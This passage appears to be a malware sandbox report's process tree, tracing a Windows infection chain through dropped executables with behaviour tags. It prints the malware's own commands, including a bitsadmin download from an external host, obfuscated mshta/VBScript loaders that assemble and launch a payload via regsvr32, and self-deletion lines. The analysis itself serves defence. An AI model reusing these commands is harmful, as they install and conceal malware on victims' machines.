                                                                                  C:\Users\Admin\Documents\SawPZg18vXDmwvvpVJVCITOV.exe
                                                                                  3⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:4780
                                                                              • C:\Users\Admin\Documents\S6au7GOhZxElCM_5gMtCwGeq.exe
                                                                                "C:\Users\Admin\Documents\S6au7GOhZxElCM_5gMtCwGeq.exe"
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                • Checks BIOS information in registry
                                                                                • Checks whether UAC is enabled
                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                PID:4388
                                                                              • C:\Users\Admin\Documents\bWN8iAWkcDafa5QCOVMdiYQj.exe
                                                                                "C:\Users\Admin\Documents\bWN8iAWkcDafa5QCOVMdiYQj.exe"
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                PID:1308
                                                                              • C:\Users\Admin\Documents\taHKn3DTW9930UXAKqSXglTv.exe
                                                                                "C:\Users\Admin\Documents\taHKn3DTW9930UXAKqSXglTv.exe"
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                PID:4196
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                                  3⤵
                                                                                    PID:1384
                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                      taskkill /f /im chrome.exe
                                                                                      4⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:4956
                                                                                • C:\Users\Admin\Documents\RJLhLnVFNWrcTxkQcF72SucV.exe
                                                                                  "C:\Users\Admin\Documents\RJLhLnVFNWrcTxkQcF72SucV.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:4576
                                                                                  • C:\Users\Admin\Documents\RJLhLnVFNWrcTxkQcF72SucV.exe
                                                                                    "C:\Users\Admin\Documents\RJLhLnVFNWrcTxkQcF72SucV.exe"
                                                                                    3⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Checks SCSI registry key(s)
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    PID:4396
                                                                                • C:\Users\Admin\Documents\k_3ExBIGAJrFef8MV2qtdVmb.exe
                                                                                  "C:\Users\Admin\Documents\k_3ExBIGAJrFef8MV2qtdVmb.exe"
                                                                                  2⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • Drops file in Program Files directory
                                                                                  PID:4672
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd2539.tmp\tempfile.ps1"
                                                                                    3⤵
                                                                                      PID:5108
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd2539.tmp\tempfile.ps1"
                                                                                      3⤵
                                                                                        PID:4480
                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          4⤵
                                                                                            PID:1384
                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd2539.tmp\tempfile.ps1"
                                                                                          3⤵
                                                                                            PID:5396
                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd2539.tmp\tempfile.ps1"
                                                                                            3⤵
                                                                                              PID:6092
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd2539.tmp\tempfile.ps1"
                                                                                              3⤵
                                                                                                PID:5880
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd2539.tmp\tempfile.ps1"
                                                                                                3⤵
                                                                                                  PID:6056
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd2539.tmp\tempfile.ps1"
                                                                                                  3⤵
                                                                                                  • Checks for any installed AV software in registry
                                                                                                  PID:2520
                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                  "bitsadmin" /Transfer helper http://addingcrapstdownld.com/data/data.7z C:\zip.7z
                                                                                                  3⤵
                                                                                                  • Download via BitsAdmin
                                                                                                  PID:4468
                                                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pXCqGrdJb7sQvuEj -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                  3⤵
                                                                                                    PID:2644
                                                                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -phs4opgQYQzGH8jz -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                    3⤵
                                                                                                    • Drops file in Program Files directory
                                                                                                    PID:6896
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd2539.tmp\tempfile.ps1"
                                                                                                    3⤵
                                                                                                      PID:4564
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd2539.tmp\tempfile.ps1"
                                                                                                      3⤵
                                                                                                        PID:5412
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd2539.tmp\tempfile.ps1"
                                                                                                        3⤵
                                                                                                          PID:3912
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd2539.tmp\tempfile.ps1"
                                                                                                          3⤵
                                                                                                            PID:6028
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd2539.tmp\tempfile.ps1"
                                                                                                            3⤵
                                                                                                              PID:6076
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd2539.tmp\tempfile.ps1"
                                                                                                              3⤵
                                                                                                                PID:6452
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd2539.tmp\tempfile.ps1"
                                                                                                                3⤵
                                                                                                                  PID:7068
                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd2539.tmp\tempfile.ps1"
                                                                                                                  3⤵
                                                                                                                    PID:1536
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd2539.tmp\tempfile.ps1"
                                                                                                                    3⤵
                                                                                                                      PID:3880
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsd2539.tmp\tempfile.ps1"
                                                                                                                      3⤵
                                                                                                                        PID:5836
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4672 -s 1180
                                                                                                                        3⤵
                                                                                                                        • Program crash
                                                                                                                        PID:5800
                                                                                                                    • C:\Users\Admin\Documents\CgFYODBfoEJvwxW5dLmIfuJO.exe
                                                                                                                      "C:\Users\Admin\Documents\CgFYODBfoEJvwxW5dLmIfuJO.exe"
                                                                                                                      2⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:4652
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c cmd < Poi.vsd
                                                                                                                        3⤵
                                                                                                                          PID:3448
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            cmd
                                                                                                                            4⤵
                                                                                                                              PID:4816
                                                                                                                              • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                findstr /V /R "^nZwSZJdQSZwKBWJCtpbfZHNwzsXALugVPsbikcLGmlTQMSJGkUUtRoHQkZmHLQyLLuVpnCdInRQPNWfBIsgQkprGKGWkWrUJtiyFXmiJDkGqaSrgKXZxBgABegmS$" Che.vsd
                                                                                                                                5⤵
                                                                                                                                  PID:4292
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                                                                                                  Dare.exe.com D
                                                                                                                                  5⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:4768
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com D
                                                                                                                                    6⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:4256
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com D
                                                                                                                                      7⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:4288
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com D
                                                                                                                                        8⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        PID:3628
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com D
                                                                                                                                          9⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                          PID:1236
                                                                                                                                          • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                            C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                            10⤵
                                                                                                                                              PID:5804
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5804 -s 240
                                                                                                                                                11⤵
                                                                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                • Program crash
                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                PID:4460
                                                                                                                                  • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                    ping 127.0.0.1 -n 30
                                                                                                                                    5⤵
                                                                                                                                    • Runs ping.exe
                                                                                                                                    PID:5020
                                                                                                                            • C:\Users\Admin\Documents\TDU5NjSG9buyYmMXuu92S2Dq.exe
                                                                                                                              "C:\Users\Admin\Documents\TDU5NjSG9buyYmMXuu92S2Dq.exe"
                                                                                                                              2⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:4932
                                                                                                                              • C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe
                                                                                                                                "C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe"
                                                                                                                                3⤵
                                                                                                                                  PID:3628
                                                                                                                                  • C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe
                                                                                                                                    "C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe"
                                                                                                                                    4⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:4212
                                                                                                                                • C:\Program Files (x86)\Browzar\Browzar.exe
                                                                                                                                  "C:\Program Files (x86)\Browzar\Browzar.exe"
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                  PID:4332
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 2792
                                                                                                                                    4⤵
                                                                                                                                    • Program crash
                                                                                                                                    PID:3524
                                                                                                                              • C:\Users\Admin\Documents\v2SLSX8Gk8JKaGxETcDCxU2V.exe
                                                                                                                                "C:\Users\Admin\Documents\v2SLSX8Gk8JKaGxETcDCxU2V.exe"
                                                                                                                                2⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Loads dropped DLL
                                                                                                                                • Checks processor information in registry
                                                                                                                                PID:4924
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im v2SLSX8Gk8JKaGxETcDCxU2V.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\v2SLSX8Gk8JKaGxETcDCxU2V.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                  3⤵
                                                                                                                                    PID:1872
                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      taskkill /im v2SLSX8Gk8JKaGxETcDCxU2V.exe /f
                                                                                                                                      4⤵
                                                                                                                                      • Kills process with taskkill
                                                                                                                                      PID:2520
                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                      timeout /t 6
                                                                                                                                      4⤵
                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                      PID:2520
                                                                                                                                • C:\Users\Admin\Documents\kCHiS2FcoxVMpHP9DkUcf1Ro.exe
                                                                                                                                  "C:\Users\Admin\Documents\kCHiS2FcoxVMpHP9DkUcf1Ro.exe"
                                                                                                                                  2⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:4500
                                                                                                                                  • C:\Users\Admin\Documents\kCHiS2FcoxVMpHP9DkUcf1Ro.exe
                                                                                                                                    "C:\Users\Admin\Documents\kCHiS2FcoxVMpHP9DkUcf1Ro.exe"
                                                                                                                                    3⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                    PID:3316
                                                                                                                                • C:\Users\Admin\Documents\u5anCGbeTT2aU5yemvxbCvm7.exe
                                                                                                                                  "C:\Users\Admin\Documents\u5anCGbeTT2aU5yemvxbCvm7.exe"
                                                                                                                                  2⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:5008
                                                                                                                                  • C:\Users\Admin\Documents\u5anCGbeTT2aU5yemvxbCvm7.exe
                                                                                                                                    "C:\Users\Admin\Documents\u5anCGbeTT2aU5yemvxbCvm7.exe" -a
                                                                                                                                    3⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:764
                                                                                                                              • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                1⤵
                                                                                                                                • Process spawned unexpected child process
                                                                                                                                PID:4788
                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                  2⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  PID:1000
                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                1⤵
                                                                                                                                  PID:5644
                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                  1⤵
                                                                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                  PID:5176
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\5D35.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\5D35.exe
                                                                                                                                  1⤵
                                                                                                                                    PID:7108
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\69F8.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\69F8.exe
                                                                                                                                    1⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:7132
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\742A.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\742A.exe
                                                                                                                                    1⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:7152
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7C1B.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7C1B.exe
                                                                                                                                    1⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                                    PID:5312
                                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                                    1⤵
                                                                                                                                      PID:4480
                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                      1⤵
                                                                                                                                        PID:1548
                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:5704
                                                                                                                                        • C:\Windows\explorer.exe
                                                                                                                                          C:\Windows\explorer.exe
                                                                                                                                          1⤵
                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                          PID:6244
                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                          1⤵
                                                                                                                                            PID:6004
                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                            1⤵
                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                            PID:6272
                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                            1⤵
                                                                                                                                              PID:5356
                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                              1⤵
                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                              PID:2300
                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                              1⤵
                                                                                                                                                PID:6440
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\5620.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\5620.exe
                                                                                                                                                1⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                • Checks processor information in registry
                                                                                                                                                PID:2616
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im 5620.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\5620.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                  2⤵
                                                                                                                                                    PID:7160
                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                      taskkill /im 5620.exe /f
                                                                                                                                                      3⤵
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      PID:2772
                                                                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                      timeout /t 6
                                                                                                                                                      3⤵
                                                                                                                                                      • Delays execution with timeout.exe
                                                                                                                                                      PID:5716
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\5B42.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\5B42.exe
                                                                                                                                                  1⤵
                                                                                                                                                    PID:4964
                                                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                      "C:\Windows\System32\mshta.exe" VBscRIPT:ClOSe (creAtEobJEct ( "WSCRIPt.ShElL" ). Run( "C:\Windows\system32\cmd.exe /Q /C TyPE ""C:\Users\Admin\AppData\Local\Temp\5B42.exe"" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if """" == """" for %w in ( ""C:\Users\Admin\AppData\Local\Temp\5B42.exe"" ) do taskkill -F -im ""%~Nxw"" " , 0 , tRUe ) )
                                                                                                                                                      2⤵
                                                                                                                                                        PID:4920
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\system32\cmd.exe" /Q /C TyPE "C:\Users\Admin\AppData\Local\Temp\5B42.exe" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if "" == "" for %w in ( "C:\Users\Admin\AppData\Local\Temp\5B42.exe" ) do taskkill -F -im "%~Nxw"
                                                                                                                                                          3⤵
                                                                                                                                                            PID:6536
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe
                                                                                                                                                              ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT
                                                                                                                                                              4⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:4116
                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                "C:\Windows\System32\mshta.exe" VBscRIPT:ClOSe (creAtEobJEct ( "WSCRIPt.ShElL" ). Run( "C:\Windows\system32\cmd.exe /Q /C TyPE ""C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe"" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if ""-pLTfn82smRxoqI1Rgg5LiENy6ewubmT "" == """" for %w in ( ""C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe"" ) do taskkill -F -im ""%~Nxw"" " , 0 , tRUe ) )
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:5084
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /Q /C TyPE "C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if "-pLTfn82smRxoqI1Rgg5LiENy6ewubmT " == "" for %w in ( "C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe" ) do taskkill -F -im "%~Nxw"
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:4952
                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                    "C:\Windows\System32\mshta.exe" VbsCripT:cLose ( cReatEoBJEcT ( "WScript.sheLl" ). Run ( "CMd.EXe /C EChO YE%TIMe%i> q1Qo.EY & echo | seT /P = ""MZ"" > FIq2DqT_.Q &copy /b /y FIq2DQT_.Q + QBEZ3.8 + R5FQa3.v3P + WWAA.Ue5 + JBVF~.yS + rcEI.~+ Mj12.DS + q1QO.Ey ..\mRZCIH.DO & Del /q *& STart regsvr32.exe -S ..\MRZCIH.DO /U " , 0 , true ) )
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:6816
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C EChO YE%TIMe%i> q1Qo.EY & echo | seT /P = "MZ" > FIq2DqT_.Q &copy /b /y FIq2DQT_.Q + QBEZ3.8 + R5FQa3.v3P +WWAA.Ue5 + JBVF~.yS + rcEI.~+Mj12.DS + q1QO.Ey ..\mRZCIH.DO & Del /q *& STart regsvr32.exe -S ..\MRZCIH.DO /U
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:6112
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo "
                                                                                                                                                                            7⤵
                                                                                                                                                                              PID:6892
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>FIq2DqT_.Q"
                                                                                                                                                                              7⤵
                                                                                                                                                                                PID:7020
                                                                                                                                                                              • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                regsvr32.exe -S ..\MRZCIH.DO /U
                                                                                                                                                                                7⤵
                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                                                PID:4832
                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                          taskkill -F -im "5B42.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                          PID:6584
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\6C79.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\6C79.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                    PID:3948
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\73CD.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\73CD.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:6136
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-LJE7C.tmp\73CD.tmp
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-LJE7C.tmp\73CD.tmp" /SL5="$203FE,188175,104448,C:\Users\Admin\AppData\Local\Temp\73CD.exe"
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:5544
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-6A23O.tmp\134 Vaporeondè_éçè_)))_.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-6A23O.tmp\134 Vaporeondè_éçè_)))_.exe" /S /UID=rec7
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Drops file in Drivers directory
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                            PID:6676
                                                                                                                                                                            • C:\Program Files\Windows Mail\FHTQTOHZAW\irecord.exe
                                                                                                                                                                              "C:\Program Files\Windows Mail\FHTQTOHZAW\irecord.exe" /VERYSILENT
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              PID:5132
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-LD72H.tmp\irecord.tmp
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-LD72H.tmp\irecord.tmp" /SL5="$60318,5808768,66560,C:\Program Files\Windows Mail\FHTQTOHZAW\irecord.exe" /VERYSILENT
                                                                                                                                                                                5⤵
                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                PID:7040
                                                                                                                                                                                • C:\Program Files (x86)\i-record\I-Record.exe
                                                                                                                                                                                  "C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                                                  6⤵
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  PID:6348
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\a9-d9d31-fd7-1309f-71ee3aebaac11\Vubyfaeraeri.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\a9-d9d31-fd7-1309f-71ee3aebaac11\Vubyfaeraeri.exe"
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              PID:5236
                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3wo13ftx.gsx\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                5⤵
                                                                                                                                                                                  PID:5360
                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lzxfgd5l.1ql\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:4156
                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\swrddo2d.elx\Setup3310.exe /Verysilent /subid=623 & exit
                                                                                                                                                                                    5⤵
                                                                                                                                                                                      PID:5960
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\swrddo2d.elx\Setup3310.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\swrddo2d.elx\Setup3310.exe /Verysilent /subid=623
                                                                                                                                                                                        6⤵
